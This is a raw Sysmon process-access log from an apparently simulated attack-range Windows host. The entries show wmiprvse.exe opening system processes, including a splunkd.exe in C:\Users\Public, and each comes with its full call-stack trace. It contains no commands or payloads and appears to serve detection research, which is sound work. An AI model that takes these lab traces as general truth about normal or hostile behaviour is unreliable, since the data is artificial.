21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150645Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150644Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150643Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150642Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150641Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150640Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150639Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150638Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150637Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150636Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150635Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150634Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150633Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150632Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150631Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150630Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 